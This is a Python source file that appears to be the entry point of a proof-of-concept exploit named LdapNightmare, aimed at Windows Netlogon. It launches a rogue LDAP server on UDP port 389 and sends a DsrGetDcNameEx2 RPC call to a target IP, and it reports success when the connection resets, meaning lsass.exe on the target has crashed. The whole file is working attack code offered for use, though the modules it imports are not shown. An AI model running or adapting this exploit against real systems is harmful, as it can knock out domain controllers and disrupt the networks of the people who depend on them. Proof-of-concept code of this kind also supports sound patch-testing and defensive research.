LdapNightmare.py

import time
import asyncio
import argparse
import threading

from logger import logger
from rpc_call import DsrGetDcNameEx2
from exploit_server import run_exploit_server

def start_ldap_server(listen_port: int):
    """Run the async LDAP server in this thread."""
    asyncio.run(run_exploit_server(listen_port))

def main():
    parser = argparse.ArgumentParser(
        description="Call NRPC DsrGetDcNameEx2 via Impacket"
    )
    parser.add_argument("target_ip", help="Target IP address (required)")
    parser.add_argument(
        "--port", "-p",
        type=int,
        default=49664,
        help="TCP port for RPC (default: 49664)"
    )
    parser.add_argument(
        "--listen-port", "-l",
        type=int,
        default=389,
        help="UDP port for exploit server listen (default: 389)"
    )
    parser.add_argument(
        "--domain-name", "-d",
        required=True,
        help="DomainName parameter"
    )
    parser.add_argument(
        "--account", "-a",
        default="Administrator",
        help="AccountName parameter (default: Administrator)"
    )
    parser.add_argument(
        "--site-name", "-s",
        default="",
        help="SiteName parameter (default: empty string)"
    )

    args = parser.parse_args()

    # 1. Start the exploit server in a background thread.
    server_thread = threading.Thread(target=start_ldap_server, daemon=True, args=(args.listen_port,))
    server_thread.start()

    # 2. Optionally, wait a moment to ensure server is listening
    logger.info("Waiting for udp server to start...")
    time.sleep(2)  

    # 3. Now call your RPC function
    logger.info("Calling DsrGetDcNameEx2 now...")
    try:
        DsrGetDcNameEx2(
            target_ip=args.target_ip,
            port=args.port,
            account=args.account,
            site_name=args.site_name,
            domain_name=args.domain_name
        )
        logger.error("Failed to trigger the vulnerability!")
    except ConnectionResetError:
        # Netlogon is implemented inside the lsass.exe process,
        # So the connection will be reset after the exploit is triggered.
        logger.info("Successfuly triggered the vulnerability!")


if __name__ == "__main__":
    main()